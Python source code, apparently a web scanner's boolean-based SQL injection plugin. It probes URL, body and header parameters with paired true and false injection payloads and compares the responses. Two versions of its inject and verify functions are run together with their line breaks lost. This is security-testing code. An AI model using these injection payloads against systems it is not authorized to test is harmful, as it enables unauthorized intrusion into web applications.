def inject(self, req_false, req_true, payload_right, payload_false): rf = request(**req_false) rt = request(**req_true) if rf != None and rt != None: if self.dictdata.get("response").get("mime_stated") == "HTML": rf_text = getFilteredPageContent(removeDynamicContent(rf.text, self.dynamic)) rt_text = getFilteredPageContent(removeDynamicContent(rt.text, self.dynamic)) else: rf_text = removeDynamicContent(rf.text, self.dynamic) rt_text = removeDynamicContent(rt.text, self.dynamic) rf_similar = round(similar(rf_text, self.text), 3) rt_similar = round(similar(rt_text, self.text), 3) rt_rf_similar = round(similar(rf.text, rt.text), 3) # print("{} rtpayload{} rfpayload{} rf:{},rt:{},both:{}".format(self.data.url_path,self.payload_rt,self.payload_rf,rf_similar,rt_similar,rt_rf_similar)) if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98: response_rt = response_parser(rt) response_rf = response_parser(rf) self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0], "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "payload": "payload_true:{} payload_false:{}".format(payload_right, payload_false), "similar_rate": "payload_false_rate:{} payload_true_rate:{} payload_true_false_rate:{}".format( rf_similar, rt_similar, rt_rf_similar), "request_true": response_rt.getrequestraw(), "response_true": response_rt.getresponseraw(), "request_false": response_rf.getrequestraw(), "response_false": response_rf.getresponseraw(), } }) return True
def inject(self, req_false, req_true, payload_right, payload_false, param_name): found_flag = 0 response_rt = b"" response_rf = b"" rf_similar = 0 rt_similar = 0 rt_rf_similar = 0 for count_num in range(self.verify_count): rf = request(**req_false) rt = request(**req_true) if rf != None and rt != None: if self.dictdata.get("response").get("mime_stated") == "HTML": rf_text = getFilteredPageContent( removeDynamicContent(rf.text, self.dynamic)) rt_text = getFilteredPageContent( removeDynamicContent(rt.text, self.dynamic)) else: rf_text = removeDynamicContent(rf.text, self.dynamic) rt_text = removeDynamicContent(rt.text, self.dynamic) rf_similar = round(similar(rf_text, self.text), 3) rt_similar = round(similar(rt_text, self.text), 3) rt_rf_similar = round(similar(rf.text, rt.text), 3) if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98: response_rt = response_parser(rt) response_rf = response_parser(rf) found_flag += count_num continue break if found_flag == sum(range(self.verify_count)): self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0], "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "param": param_name, "payload": "payload_true:{} payload_false:{}".format( payload_right, payload_false), "similar_rate": "payload_true_rate:{} payload_false_rate:{} payload_true_false_rate:{}" .format(rt_similar, rf_similar, rt_rf_similar), "request_true": response_rt.getrequestraw(), "response_true": response_rt.getresponseraw(), "request_false": response_rf.getrequestraw(), "response_false": response_rf.getresponseraw(), } }) return True
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return parser = dictdata_parser(self.dictdata) # send again . to find dynamic text self.dynamic = [] r = request(**parser.getrawrequest()) if r != None: ret = findDynamicContent(parser.getresponsebody().decode(errors="ignore"), r.text) if ret: self.dynamic.extend(ret) if self.dictdata.get("response").get("mime_stated") == "HTML": self.text = getFilteredPageContent(removeDynamicContent(r.text, self.dynamic)) else: self.text = removeDynamicContent(r.text, self.dynamic) else: return # test url and body params sql_flag = [ "'and'{0}'='{1}", '"and"{0}"="{1}', ] #url and body params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: success = False payloads = copy.deepcopy(sql_flag) if param.get("value") in ["desc", "asc"]: payloads = ",if('{0}'='{1}',1,(select 1 from information_schema.tables))" for payload in payloads: random_str = get_random_str(2).lower() payload_right = payload.format(random_str + "a", random_str + "a") payload_false = payload.format(random_str + "b", random_str + "c") req_true = parser.getreqfromparam(param, "a", payload_right) req_false = parser.getreqfromparam(param, "a", payload_false) if self.inject(req_false, req_true, payload_right, payload_false): success = True break if not success and str(param.get("value")).isdigit(): param_value = param.get("value") random_num = random.randint(2, 8) payloads_num = [ ("/0", "*1"), ("/**/and+{0}={1}".format(random_num, random_num + 1), "/**/and+{0}={1}".format(random_num, random_num)), ] for payload_false, payload_right in payloads_num: req_true = parser.getreqfromparam(param, "a", payload_right) req_false = parser.getreqfromparam(param, "a", payload_false) if self.inject(req_false, req_true, param_value + payload_right, param_value + payload_false): break pass
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parser = dictdata_parser(self.dictdata) # send again . to find dynamic text self.dynamic = [] r = request(**self.parser.getrawrequest()) if r != None: ret = findDynamicContent( self.parser.getresponsebody().decode(errors="ignore"), r.text) if ret: self.dynamic.extend(ret) if self.dictdata.get("response").get("mime_stated") == "HTML": self.text = getFilteredPageContent( removeDynamicContent(r.text, self.dynamic)) else: self.text = removeDynamicContent(r.text, self.dynamic) else: return # test url and body params sql_flag = [ "' and '{0}'='{1}", '" and "{0}"="{1}', ] # url and body params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") if params: for param in params: success = False payloads = copy.deepcopy(sql_flag) if param.get("value") in ["desc", "asc"]: payloads += [ ",if('{0}'='{1}',1,(select 1 from information_schema.tables))" ] for payload in payloads: random_str = get_random_str(2).lower() payload_right = payload.format(random_str + "a", random_str + "a") payload_false = payload.format(random_str + "b", random_str + "c") req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, payload_right, payload_false, param.get("name")): success = True break if not success and str(param.get("value")).isdigit(): param_value = param.get("value") random_num = random.randint(2, 8) payloads_num = [ ("/0", "*1"), ("/**/and+{0}={1}".format(random_num, random_num + 1), "/**/and+{0}={1}".format(random_num, random_num)), ] for payload_false, payload_right in payloads_num: req_true = self.parser.getreqfromparam( param, "a", payload_right) req_false = self.parser.getreqfromparam( param, "a", payload_false) if self.inject(req_false, req_true, param_value + payload_right, param_value + payload_false, param.get("name")): break pass # host header 部分 if not plugin_set.get("sqli").get("header_inject"): return header_msg = { "User-Agent": { "msg": "sqli_boolen_ua", "default": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" }, "Referer": { "msg": "sqli_boolen_referer", "default": "https://www.qq.com/search" }, "X-Forwarded-For": { "msg": "sqli_boolen_xff", "default": "12.40.9.144" }, "Real-Ip": { "msg": "sqli_boolen_ri", "default": "2.40.9.144" }, "X-Forwarded-Host": { "msg": "sqli_boolen_xfh", "default": "2.40.9.144" }, } reqs = [] for k, v in header_msg.items(): if self.output(v.get("msg")): logger.debug("start {} inject ".format(k)) headers = copy.deepcopy( self.dictdata.get("request").get("headers")) if k not in headers.keys(): headers[k] = v.get("default") reqs.append((headers, k, v)) mythread(self.inject_headers, reqs, cmd_line_options.threads)
def inject_headers(self, data): sql_flag = [ "' and '{0}'='{1}", '" and "{0}"="{1}', ] headers, k, v = data for sql_ in sql_flag: found_flag = 0 response_rt = b"" response_rf = b"" rf_similar = 0 rt_similar = 0 rt_rf_similar = 0 payload_right = "" payload_false = "" random_str = get_random_str(2).lower() for count_num in range(self.verify_count): req_false_header = copy.deepcopy(headers) req_true_header = copy.deepcopy(headers) payload_false = sql_.format(random_str + "b", random_str + "c") payload_right = sql_.format(random_str + "b", random_str + "b") req_false_header[k] = req_false_header[k] + payload_false req_true_header[k] = req_true_header[k] + payload_right req_false = self.parser.generaterequest( {"headers": req_false_header}) req_true = self.parser.generaterequest( {"headers": req_true_header}) rf = request(**req_false) rt = request(**req_true) if rf != None and rt != None: if self.dictdata.get("response").get( "mime_stated") == "HTML": rf_text = getFilteredPageContent( removeDynamicContent(rf.text, self.dynamic)) rt_text = getFilteredPageContent( removeDynamicContent(rt.text, self.dynamic)) else: rf_text = removeDynamicContent(rf.text, self.dynamic) rt_text = removeDynamicContent(rt.text, self.dynamic) rf_similar = round(similar(rf_text, self.text), 3) rt_similar = round(similar(rt_text, self.text), 3) rt_rf_similar = round(similar(rf.text, rt.text), 3) if rt_rf_similar != 1.0 and rt_similar > rf_similar and rt_similar > 0.98: response_rt = response_parser(rt) response_rf = response_parser(rf) found_flag += count_num continue break if found_flag == sum(range(self.verify_count)): self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0], "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "param": "header's {}".format(k), "payload": "payload_true:{} payload_false:{}".format( payload_right, payload_false), "similar_rate": "payload_true_rate:{} payload_false_rate:{} payload_true_false_rate:{}" .format(rt_similar, rf_similar, rt_rf_similar), "request_true": response_rt.getrequestraw(), "response_true": response_rt.getresponseraw(), "request_false": response_rf.getrequestraw(), "response_false": response_rf.getresponseraw(), } }) return